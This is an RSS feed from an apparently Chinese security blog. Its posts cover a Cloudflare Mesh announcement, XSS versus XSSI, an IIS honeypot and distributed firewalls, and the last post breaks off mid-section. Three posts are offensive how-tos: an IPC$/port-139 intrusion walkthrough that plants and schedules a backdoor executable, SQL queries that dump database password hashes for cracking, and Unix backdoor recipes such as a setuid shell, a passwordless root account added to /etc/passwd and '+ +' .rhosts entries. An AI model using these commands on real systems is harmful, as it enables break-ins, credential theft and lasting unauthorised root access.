<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
	<channel>
		<title>海东青's blog</title>
		<link>https://www.cete.vip/</link>
		<description>总是需要一些温暖。哪怕是一点点自以为是的纪念。</description>
		<copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>
		<generator>SaBlog-X Version 1.6 Build 20071004</generator>
		<lastBuildDate>Sat, 18 Jul 2026 14:51:29 +0000</lastBuildDate>
		<ttl>30</ttl>
		<item>
			<guid>https://www.cete.vip/show-3460-1.html</guid>
			<title>Cloudflare 推出全球跨设备跨网私有 Mesh 组网服务</title>
			<author>海东青</author>
			<description><![CDATA[<p><font size="4" style="overflow-wrap: break-word; color: rgb(68, 68, 68); font-family: Tahoma, Helvetica, &quot;Microsoft Yahei&quot;, sans-serif;"><br style="overflow-wrap: break-word;" />
<span style="font-size: 14px;">每账号免费 50 设备 + 50 用户，专为 AI 智能体打通安全通道</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">当地时间 4 月 14 日，Cloudflare 宣布推出私有组网服务 Cloudflare Mesh，将 AI 智能体、人与多云端基础设施统一整合到一个安全网络内，为企业组织构建、部署和治理新一代 AI 应用提供网络基座。</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">Cloudflare 联合创始人兼 CEO 马修 &middot; 普林斯表示：&ldquo;AI 智能体已是现代开发工作流中的标配，但它们正被一个专为人类设计的网络模型拖累。多年来，开发者只有两个选择：要么花好几天折腾复杂笨重的 敏感词XXX，要么冒着危险把私有基础设施暴露在公网上。Cloudflare Mesh 则消除了这种取舍 &mdash;&mdash; 无论智能体运行在 Cloudflare 上、私有数据中心里还是其他公有云中，我们都能为智能体和基础设施之间提供安全桥梁，确保团队部署的每个智能体从一开始就是安全的。&rdquo;</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">Cloudflare 强调，Mesh 与很多人在用的 Cloudflare Tunnel 截然不同 &mdash;&mdash; 后者是单向将流量敏感词XX到特定服务，而 Mesh 提供的是多对多的全网互通，网络中任意节点均可通过私有 IP 直接相互访问。所有流量经由 Cloudflare 全球 330 多个城市的边缘网络路由，敏感数据全程加密且对外部威胁不可见。</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">在安全管控层面，Mesh 运行于 Cloudflare One 平台，现有的 Gateway 策略规则无需额外配置即可自动适用于所有 Mesh 流量。每账号免费提供 50 个节点和 50 个用户，所有 Cloudflare 账户均可使用。</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">另外，Mesh 还为 AI 智能体引入了身份层。在 Mesh 环境中，每个智能体都像人类员工一样拥有独立身份，安全团队可以编写精细的策略 &mdash;&mdash; 例如允许某个编码智能体或沙箱读取预发布数据库，但严格阻止其访问生产环境中的财务记录。典型应用场景包括：在手机上安全访问家中设备的本地服务而不暴露公网端口；让笔记本上的 AI 编码工具直接查询云端 VPC 中的预发布数据库；以及在 Cloudflare Workers 上部署的智能体通过 Workers VPC 绑定访问内部 API。</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">Cloudflare 还同步宣布与 Wiz（现为 Google Cloud 旗下）建立合作伙伴关系，提供跨企业环境的统一 AI 安全与可视化方案，帮助企业在多云和本地系统之间运行智能体工作负载时，不再需要拼接多个 敏感词XXX、身份和安全管理工具。</span><br style="overflow-wrap: break-word; font-size: 14px;" />
<br style="overflow-wrap: break-word; font-size: 14px;" />
<span style="font-size: 14px;">后续规划包括主机名路由（按服务名而非 IP 地址访问）、Mesh DNS（节点加入后自动获得内部域名）、身份感知路由（支持按智能体而非按用户制定访问策略）以及 Docker 容器支持。</span></font></p>]]></description>
			<link>https://www.cete.vip/show-3460-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2026-07-06 17:38</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3450-1.html</guid>
			<title>139入侵简易教程</title>
			<author>海东青</author>
			<description><![CDATA[　　net use\192.168.0.1ipc$Content$nbsp;&quot;&quot; /user:administrator　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。　　首先，连接的命令是：　　net&lt;空格&gt;use&lt;空格&gt;\IP地<p>　　net use\\192.168.0.1\ipc$Content$nbsp;&quot;&quot; /user:administrator</p><p>　　提到139端口，我想知道的人一定非常多，本来是不想用写这个教程的，但考虑要照顾到新人，所以还是简单的写一下。</p><p>　　首先，连接的命令是：</p><p>　　net&lt;空格&gt;use&lt;空格&gt;\\IP地址\ipc$Content$lt;空格&gt;密码&lt;空格&gt;/user:用户名</p><p>　　假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的：</p><p>　　netuse \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功，那么系统会提示&quot;命令成功完成&quot;!</p><p>　　空密码是这样的：</p><p>　　如果密码是空的，那就在原先输入密码的地方以&quot;&quot;代替。</p><p>　　开始查看权限：</p><p>　　查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的：</p><p>　　copy&lt;&gt;文件绝对路径&lt;&gt;\\IP地址\文件目标路径</p><p>　　比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下：</p><p>　　copy c:\a.exe \\192.168.1.11\d$Content$nbsp;</p><p>　　要注意&quot;$&quot;符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要&quot;$&quot;符了。如果命令执行成功，系统同样会提示&quot;已复制 1 个文件&quot;</p><p>　　小技巧：</p><p>　　再次复制相同文件至相同路径，以检测是否存在杀毒软件！！！</p><p>　　如果系统提示&ldquo;改写\\192.168.1.11\d$\a.exe 吗? (Yes/No/All):&rdquo;则说明文件在还在目标系统上，没有被杀毒软件查杀（一般发送过去的都是后门程序只类的东西，只有系统安装了杀毒软件都会被杀掉）。如果没有提示，则说明安装了杀毒软件。</p><p>　　查看目标系统时间，准备使用at任务计划运行程序。</p><p>　　命令格式：</p><p>　　net&lt;空格&gt;time&lt;空格&gt;\\IP地址</p><p>　　例子：</p><p>　　net time\\192.168.1.11</p><p>　　系统会返回目标的当前时间，时间显示后，AT任务计划命令需要使用24小时制。比如系统显示&ldquo;\\192.168.1.11 的当前时间是 2006/5/10 下午 06:02&rdquo;在使用到AT任务计划命令时，这个&ldquo;下午06：02&rdquo;就需要换算成&ldquo;18：02&rdquo;！</p><p>　　使用AT命令为目标系统添加任务计划：</p><p>　　格式：</p><p>　　at&lt;空格&gt;\\IP地址&lt;空格&gt;指定运行时间&lt;空格&gt;需要运行的文件路径名</p><p>　　例子：</p><p>　　at \\192.168.1.1118:20 d:\a.exe</p><p>　　IPC通道入侵就目前来看已经是一个非常老的攻击手段了，现在针对IPC通道的防御手段也越来越多，越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限，那对于被攻击的系统来说无意是致命的。</p><p>　　所以，建议用户将Server服务关闭,信使服务与Task Scheduler服务（计划任务）也都关闭，这样可以较全面的保护计算机在IPC通道方面的安全。</p>]]></description>
			<link>https://www.cete.vip/show-3450-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2016-11-09 07:22</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3449-1.html</guid>
			<title>浅析XSS与XSSI异同</title>
			<author>海东青</author>
			<description><![CDATA[这篇文章主要介绍了XSS与XSSI异同，跨站脚本(XSS)和跨站脚本包含(XSSI)之间的区别是什么?防御方法有什么不同?感兴趣的小伙伴们可以参考一下<p>Michael Cobb：自上世纪90年代，攻击者就已经开始利用XSS漏洞，并且，最主要的网站(例如谷歌、雅虎和Facebook)都在一定程度上受到过XSS漏洞的影响。与大多数应用层攻击(例如SQL注入)，基于XSS的攻击会攻击应用的用户，而不是应用或服务器。这些攻击的工作原理是注入代码(通常例如JavaScript客户端脚本)到Web应用的输出。大部分网站有很多注入点，包括搜索域、cookies和表格。虽然这些恶意脚本不能直接感染服务器端信息，它们仍然可以破坏网站的安全性。通过使用Document Object Model操作来更改表格值，改变网页的外观或切换表格操作以张贴提交的数据到攻击者的网站，攻击者可以窃取数据、控制用户的会话、运行恶意代码或用作网络钓鱼欺诈的一部分。</p><p align="center"><img id="theimg" alt="" src="http://files.jb51.net/file_images/article/201602/2016215145119215.jpg?2016115145132" /></p><p><strong>XSSI是XSS的一种形式</strong>，它利用了这样一个事实，即浏览器不会阻止网页加载图像和文字等资源，这些资源通常托管在其他域和服务器。例如，脚本可能提供攻击者需要的功能，帮助创建特定的页面&mdash;很多网站包含托管在https://developers.google.com/speed/libraries/#jquery的JavaScript库jQuery。然而，这种包含可能被利用来从一个域名读取用户数据&mdash;当用户正在访问另一个域名时。例如，如果ABC银行有一个脚本用于读取用户的私人账户信息，攻击者可以在其自己的恶意网站包含这个脚本，当ABC银行的客户访问攻击者的网站时，攻击者就可以从ABC银行的服务器提取用户信息。</p><p>开发者可以部署多种措施来抵御XSSI攻击。其中一种方法是向用户提供独特的不可预测的授权令牌，在服务器响应任何请求之前，需要发送回该令牌作为额外的HTTP参数。脚本应该只能响应POST请求，这可以防止授权令牌作为GET请求中的URL参数被暴露，同时，这可以防止脚本通过脚本标签被加载。浏览器可能会重新发出GET请求，这可能会导致一个操作会执行一次以上，而重新发出的POST请求需要用户的同意。</p><p>在处理JSON请求时，在响应中增加非可执行前缀，例如&ldquo;\n&rdquo;，以确保脚本不可执行。在相同域名运行的脚本可以读取响应内容以及删除前缀，但在其他域名运行的脚本则不能。此外，开发者还应该避免使用JSONP(具有填充功能的JSON)来从不同域名加载机密数据，因为这会允许钓鱼网站收集数据。同时，发送响应表头&ldquo;X-Content-Type-Options: nosniff&rdquo;也将帮助保护IE和谷歌Chrome用户免受XSSI攻击。</p><p>为了应对XSS攻击，可在HTTP Content-Type响应表头或者HTML代码中meta标签中http-equiv属性中指定CHARSET，让浏览器不会解译其他字符集的特殊字符编码。对于使用ASP.NET开发网站的开发者，微软Anti-Cross Site Scripting Library可以帮助保护Web应用抵御跨站脚本漏洞。</p><p>现在有很多开源漏洞扫描工具可供开发者使用，以测试其代码是否容易遭受XSS攻击，例如Vega、Wapiti、OWASP的Zed Attack Proxy和Skipfish。企业应该定期对网站进行扫描，同时，在底层代码变更或依靠第三方库的功能集成到各种网页时，也应该扫描网站。</p><p>读完此文，大家应该知道两者的区别在哪了。</p>]]></description>
			<link>https://www.cete.vip/show-3449-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2016-11-09 07:20</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3451-1.html</guid>
			<title>各种数据库密码hash获取语句</title>
			<author>海东青</author>
			<description><![CDATA[摘要：各种数据库密码hash获取语句，也可以直接使用sqlmap这个注入工具！ SQL Server 2000:- SELECT password from master.dbo.sysxlogins where name='sa' 0010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 0010...<span class="soft_j_body"><span class="ad_body"><script type="text/javascript">    /*300*250，yunsec2011*/    var cpro_id = "u692981";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js" type="text/javascript"></script></span><p>各种数据库密码hash获取语句，也可以直接使用sqlmap这个注入工具！</p><p><br/>SQL Server 2000:-<br/>SELECT password from master.dbo.sysxlogins where name='sa' <br/>0&times;010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341<br/>2FD54D6119FFF04129A1D72E7C3194F7284A7F3A<br/>0&times;0100- constant header<br/>34767D5C- salt<br/>0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash<br/>2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash<br/>crack the upper case hash in 'cain and abel' and then work the case sentive hash<br/>&nbsp;</p><p><br/>SQL server 2005:-<br/>SELECT password_hash FROM sys.sql_logins where name='sa'<br/>0&times;0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F<br/>0&times;0100- constant header<br/>993BF231-salt<br/>5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash<br/>crack case sensitive hash in cain, try brute force and dictionary based attacks.<br/><br/>update:- following bernardo's comments:-<br/>use function fn_varbintohexstr() to cast password in a hex string. <br/>e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins <br/><br/>&nbsp;</p><p>MYSQL:-<br/>In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.<br/><br/>&nbsp;</p><p>*mysql &lt; 4.1<br/>mysql&gt; SELECT PASSWORD('mypass');<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;+<br/>| PASSWORD('mypass') |<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;+<br/>| 6f8c114b58f2ce9e |<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;+<br/>&nbsp;</p><p>*mysql &gt;=4.1<br/>mysql&gt; SELECT PASSWORD('mypass');<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-+<br/>| PASSWORD('mypass') |<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-+<br/>| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |<br/>+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-+<br/>Select user, password from mysql.user<br/>The hashes can be cracked in 'cain and abel' <br/>&nbsp;</p><p><br/>Postgres:-<br/>Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called &quot;postgres&quot; or &quot;pgsql&quot;)<br/>select usename, passwd from pg_shadow;<br/>usename | passwd <br/>&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;+&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;- <br/>testuser | md5fabb6d7172aadfda4753bf0507ed4396<br/>use mdcrack to crack these hashes:-<br/>$ wine MDCrack-sse.exe &ndash;algorithm=MD5 &ndash;append=testuser fabb6d7172aadfda4753bf0507ed4396</p><p><br/><br/>Oracle:-<br/>select name, password, spare4 from sys.user$<br/>hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g<br/>More on Oracle later, i am a bit bored&hellip;.</p><p>&nbsp;</p>]]></description>
			<link>https://www.cete.vip/show-3451-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2016-05-25 15:23</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3448-1.html</guid>
			<title>*nux如何创建后门</title>
			<author>海东青</author>
			<description><![CDATA[摘要：kindle's blog ， 作者：kindle 千辛万苦（or 轻而易举）的取得root后，当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现，好 的（先进）后门仍然能够使你再次轻松的破门而入 请记住...<span class="soft_j_body"><span class="ad_body"><script type="text/javascript">    /*300*250，yunsec2011*/    var cpro_id = "u692981";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js" type="text/javascript"></script></span><p>kindle's blog ， 作者：kindle</p><p>千辛万苦（or 轻而易举）的取得root后，当然希望长久的保持. 以被以后用来。。。d0ing what u want t0 d0 :) 传统的方法就是建立一个后门(backd00r).即使入侵被发现，好 的（先进）后门仍然能够使你再次轻松的破门而入 &mdash; 请记住： &rdquo; we come back and we are the h.a.c.k.e.r &rdquo;<br/>&ndash;<br/>创建后门的方法如下：<br/>-<br/>1. setuid<br/>#cp /bin/sh /tmp/.backdoor<br/>#chmod u+s /tmp/.backdoor<br/>加上 suid 位到shell 上，最为简单方便，但也最为容易被ADM 发现 find / -perm 4000 -print;同时在大多数的SUNOS 上 你会发现不能setuid。&ndash; 适用于新手；<br/>-<br/>&nbsp;</p><p>2. echo &ldquo;zer9::0:0::/:/bin/csh&rdquo; &gt;&gt; /etc/passwd 即给系统增加一个 id 为 0（root)的帐号，无口令； 也很容易被发现。 &mdash; 适用于新手；<br/>- <br/>&nbsp;</p><p>3.echo &ldquo;+ zer9&Prime;&gt;&gt;/.rhosts<br/>即本地的名为 zer9 的用户可以直接 rlogin target 无须口令此时的 zer9 就相当于口令，不知道的人是不能进去的.<br/>前提是目标的port 512or513or514 opening.<br/>注： 如 echo &ldquo;+ +&rdquo;&gt;&gt;/.rhosts 则任何用户都可rlogin至目标 导致目标门户打开，最好不要；<br/>还可 echo &ldquo;+ +&rdquo;&gt;&gt;/etc/hosts.equiv 但这样不能取得root权限；&ndash; 适用于比新手高一点点,比中级水平低一点点的guys;<br/>-<br/>&nbsp;</p><p>4.modify sendmail.cf 增加一个&rdquo;wiz&rdquo; 命令;<br/>usage:<br/>telnet target 25 [enter]<br/>wiz[enter]<br/>这是我从SAFEsuite中学到的（但没试过）；比较危险。因为几乎所有的扫描器都会刺探本漏洞。不过你可把命令本身该成其他不易猜到的名字。比较复 杂，危险，但ADM不易发现，隐蔽性较强；你只在你的机器上试一试就okay了；&ndash; 顾名思意，大师级漏洞；<br/>-<br/>&nbsp;</p><p>5. crack suck as inetd,login,&hellip;<br/>即安装它们的特络绎版本。你需要找到各版本unix的rootkit;然后分别编译即可；&ndash; 如果目标机上没有安装 tripwire之类的东东，那几乎不可能被发现。linux&amp;sunos&amp;freebsd 的可能好找，但其他的了？即使你找到了，你有对应平台上的编译器吗？我有一台运行 slackware,one running irix,one runningsunos,one running hpux,one running digits unix,&hellip;<br/>hahhahha,我又做梦了:)<br/>&ndash; 我个人认为是最好的方法，但实现起来有一定风险，你必须考虑到如果你的木马运行出错怎么办&ndash;因为我们所做的一切都必须以不破坏目标机上的任何数据为原 则；<br/>-<br/>]]></description>
			<link>https://www.cete.vip/show-3448-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2016-05-25 15:23</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3447-1.html</guid>
			<title>配置IIS蜜罐抵御黑客攻击</title>
			<author>海东青</author>
			<description><![CDATA[摘要：据有关资料显示，现在有大量的服务器仍在使用IIS提供Web服务，甚至有争夺占领Apache市场的趋势。在Web威胁日益严重的今天，我们当然要采用反病毒、防火墙、UTM、NAC等手段来加强网络安全。但是，有时正确地建设一个蜜罐也是对付黑客的必需任务。 什么是蜜罐?...<span class="soft_j_body"><span class="ad_body"><script type="text/javascript">    /*300*250，yunsec2011*/    var cpro_id = "u692981";</script><script src="http://cpro.baidustatic.com/cpro/ui/c.js" type="text/javascript"></script></span><p>据有关资料显示，现在有大量的服务器仍在使用IIS提供Web服务，甚至有争夺占领Apache市场的趋势。在Web威胁日益严重的今天，我们当然要采用反病毒、防火墙、UTM、NAC等手段来加强网络安全。但是，有时正确地建设一个蜜罐也是对付黑客的必需任务。</p><p>&nbsp;</p><p>　　什么是蜜罐?简言之，蜜罐就是一个位于互联网上的计算机系统，其特定的目的是为了吸引并&ldquo;诱捕&rdquo;试图渗透进入其他人的计算机系统的黑客。要建立一个真正的蜜罐，用户需要做的事情很多，但至少要求用户做到三条，一是安装一个不打补丁的操作系统，并且需要使用默认配置，二是要保证系统上没有任何数据，三是添加一个设计目的是记载入侵者活动的应用程序。</p><p>&nbsp;</p><p>　　在IIS中配置蜜罐并不是一件件很复杂的事情，但它却可有助于极大地减少对IIS服务器的攻击。严格意义上讲，本文所谈论的并非一个真正的蜜罐，因为一个真正的蜜罐是一个拥有许多漏洞且故意暴露在互联网上的主机，这里所讨论的只不过是一个数据通信的转向器而已。使用HTTP主机的头信息，我们完全可以将攻击者的通信转向一个并不存在的站点上。</p><p>&nbsp;</p><p>　　黑客们会使用端口扫描器来查找那些开放着80号端口的IP地址，并对这些端口实施其攻击和侵入的企图。另外一方面，网站的终端用户会使用域名来访问站点，因此我们的措施并不会影响这些普通用户。通过启用网站上的主机头名并将IP企图重新转向，我们就可以跟踪和记录黑客来自何方，同时又保持了对终端用户的可用性。</p><p>&nbsp;</p><p>　　理论上的事儿先说到这里，下面我们开始建立一个蜜罐。</p><p>　　我们需要做的第一件事情就是要在Web服务器上建立一个空的目录。其名称与位置没有什么关系，对于本例而言，笔者创建了一个称为Honeypot的目录，它位于C：\Inetpub\wwwroot的目录下。启动IIS 管理程序，并为所有的站点分配一个主机头名，这样每一台虚拟服务器都有一个带有IP地址的主机头名。如下图1：<br/>&nbsp;</p><p>　　这里要保证虚拟服务器不能与无主机头名的80号端口上的IP地址有映射关系，并保证服务器不能拥有&ldquo;全部未分配的&rdquo; IP寻地址。并保障主机的头信息正确设置，用户仍可以访问所有的站点。如图2：<br/>&nbsp;</p><p>　　然后，再创建一个新的网站指向刚才创建的目录。这个蜜罐网站应当指定所有未分配的IP地址，并且不能配置主机的头信息。虽然这个站点的名称叫&ldquo;honeypot&rdquo;，但这并不影响黑客对它的访问。进入这个新网站的属性设置界面，选择&ldquo;目录安全&rdquo;选项卡，并选中&ldquo;集成windows身份验证&rdquo;，取消选择其它的认证方法，然后单击&ldquo;确定&rdquo;。图3：</p><p>　　接着，选择网站选项卡，并单击&ldquo;高级&rdquo;，单击&ldquo;多网站配置&rdquo;下的&ldquo;添加&rdquo;按钮，并添加所有的IP地址。如果你收到了一个关于IP地址冲突的错误消息，不要紧，这表明你没有为此网站设置主机头名。你需要做的是将IP地址从列表中清除，或为此网站配置一个主机头名。图4：<br/>&nbsp;</p><p>　　保存所有的更改，然后退出Internet 信息服务。</p><p>　　这样一来，当一个恶意用户通过IP地址来访问网站时，他就会被发送至空目录，并得到一个403错误。而通过DNS域名来访问网站的用户由于有了主机的头信息，就能够访问网站的内容。<br/>&nbsp;</p><p>　　这样做并不是绝对的安全，因为黑客们仍会试图通过域名来访问网站，不过其多数攻击都被发送到了IP地址。使用主机的头信息会改善Web服务器的性能，这是因为WWW服务没有必要为使用独立IP地址的网站分配非页式内在池。<br/>&nbsp;</p><p>　　还有一点，一些较低版本的浏览器(不符合HTTP1.1规范的浏览器)将被直接转向空目录，因为这种浏览器不接受主机头名。不过，现在这种浏览器几乎没有人用了吧?</p><p><br/>&nbsp;</p>]]></description>
			<link>https://www.cete.vip/show-3447-1.html</link>
			<category domain="https://www.cete.vip/category-5-1.html">网络安全</category>
			<pubDate>2016-05-25 15:23</pubDate>
		</item>
		<item>
			<guid>https://www.cete.vip/show-3443-1.html</guid>
			<title>基于C/S架构的分布式防火墙(图)</title>
			<author>海东青</author>
			<description><![CDATA[<p><br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;随着政府、企业、个人主机的网络安全需求的与日俱增，防火墙技术应运而生。传统的边界式防火墙是企业内部网络与外部网络的一道屏障,但是其无法对内部网络访问进行控制，也没有对黑客行为进行入侵检测和阻断的功能。企业迫切需要一套真正能够解决网络内部和外部，防火墙和防黑客的安全解决方案，而基于C/S架构的分布式防火墙很好地满足了这一需求:它是由安全策略管理服务器[Server]以及客户端防火墙[Client]组成,综合运用多种先进的网络安全技术，为客户提供可靠的网络安全服务. <br />
<br />
一. 分布式防火墙系统架构<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 分布式防火墙由安全策略管理服务器[Server]以及客户端防火墙[Client]组成.客户端防火墙工作在各个从服务器、工作站、个人计算机上，根据安全策略文件的内容，依靠包过滤、特洛伊木马过滤和脚本过滤的三层过滤检查，保护计算机在正常使用网络时不会受到恶意的攻击，提高了网络安全性。而安全策略管理服务器则负责安全策略、用户、日志、审计等的管理。该服务器是集中管理控制中心，统一制定和分发安全策略，负责管理系统日志、多主机的统一管理，使终端用户&ldquo;零&rdquo;负担。<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 图1展示了分布式防火墙在政府/企业中的应用解决方案。该方案是纯软件防火墙，无须改变任何硬件设备和网络架构，就可以帮助政府/企业阻挡来自内部和外部网络的攻击。<br />
<br />
<br />
<br />
<br />
<br />
图1 分布式防火墙在政府/企业中的应用解决方案<br />
<br />
<br />
<br />
二. 分布式防火墙功能解析<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在上述图1所示的分布式防火墙解决方案中，左边为政府/企业内部网络(内网)的应用拓扑结构图，中间为Internet公众网络，我们称之为外部网络(外网)，右边为政府/企业办公和业务的延伸部分，处于外部网络环境中。在内部的财务、总裁办、人事、档案、网络管理等主机,以及数据库服务器,文件服务器上存放着政府/企业的重要信息，这些信息一旦泄漏或者存放信息的主机遭到破坏，会给政府/企业带来不良的后果。如果不采取相应措施，此网络很容易遭受来自外网和内网上的黑客攻击。若使用边界式防火墙，则外网的攻击将被阻拦，但从数据统计看，还有大部分网络攻击/破坏来源于内部网络的黑客或员工的不小心应用，这时普通防火墙就无能为力了。而政府/企业的移动办公人员、代理商、合作伙伴、远程分支机构在外部网络上很容易受到外部黑客的攻击。所以说，能够很好的阻挡内部和外部网络攻击是政府/企业内部网络安全的重要任务。<br />
<br />
<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;分布式防火墙能很好地解决上述问题。在内部网络的主服务器安装上分布式防火墙产品的安全策略管理服务器后，设置组和用户分别分配给相应的从服务器和PC机工作站，并配置相应安全策略；将客户端防火墙安装在内网和外网中的所有PC机工作站上，客户端与安全策略管理服务器的连接采用SSL协议建立通信的安全通道，避免下载安全策略和日志通信的不安全性。同时客户端防火墙的机器采用多层过滤，入侵检测，日志纪录等手段，给主机的安全运行提供强有力的保证.<br />
<br />
<br />
<br />
具体功能描述如下:<br />
<br />
1、阻止网络攻击<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 目前，黑客们常用的攻击手段有以下几种:<br />
<br />
<br />
<br />
(1)DoS拒绝服务式攻击<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 拒绝服务攻击是目前网络中新兴起的攻击手段，针对TCP/IP协议的漏洞,使对方服务器承受过多的信息请求而无法处理，产生阻塞导致正常用户的请求被拒绝。一般地有如下方式：<br />
<br />
<br />
<br />
(a)Ping-Flood:使用简单的Ping命令对服务器发送数据包，如果在很短的时间内服务器收到大量Ping数据包,那么服务器就需要耗费很多资源去处理这些数据包从而导致无法正常工作。<br />
<br />
<br />
<br />
(b)TCP-SYN-Flood: SYN数据包是两台计算机在进行TCP通信之前建立握手信号时所用，正常情况下，SYN数据包中包含有想要进行通信的源机器的IP地址，而服务器收到SYN数据包后将回复确认信息，源机器收到后再发送确认信息给服务器，服务器收到，二者就可以建立连接进行通信了。采用这种攻击方式就是在某一个极短的时间内向对方服务器发送大量的带有虚假IP地址的SYN数据包，服务器发出确认信息，但是却无法收到对方的回复，就要耗费大量的资源去处理这些等待信息，最后将使系统资源耗尽以至瘫痪。<br />
<br />
<br />
<br />
(c)UDP-Flood: UDP是基于非连接的用户数据报通讯协议，不包含流控制机制。UDP数据包很容易使得计算机系统忙于响应而丧失正常的网络业务能力。<br />
<br />
<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 另外还有诸如ICMP-Flood, IGMP-Flood等攻击手段，在此不一一详述.<br />
<br />
<br />
<br />
(2)源路由包攻击<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;源路由包采用了极少使用的一个IP选项，它允许发起者来定义两台机器间所采取的路由，而不是让中间的路由器决定所走的路径。与ICMP的重定向相比，这种特性能使一个黑客来欺骗你的系统，使之相信它正在与一台本地机器、一台ISP机器或某台其他可信的主机对话。<br />
<br />
<br />
<br />
(3)利用型攻击<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;利用型攻击是一类试图直接对你的机器进行控制的攻击，最常见的就是特洛伊木马(Trojan Horse)。例如BO2000就是典型的特洛伊木马程序。<br />
<br />
<br />
<br />
(4)信息收集型攻击<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;信息收集型攻击在初期并不对目标本身造成危害，而是被用来为进一步入侵提供有用的信息，例如：端口扫描技术，黑客使用特殊的应用程序对服务器的每个端口进行测试，以寻找可以进入的端口或者找出某些端口可以利用的安全漏洞。<br />
<br />
以上的各种攻击手段，分布式防火墙可以及时地发现，并且采取相应的措施以控制事件的进一步发展，同时记录该攻击事件。<br />
<br />
<br />
<br />
<br />
<br />
2、包过滤<br />
<br />
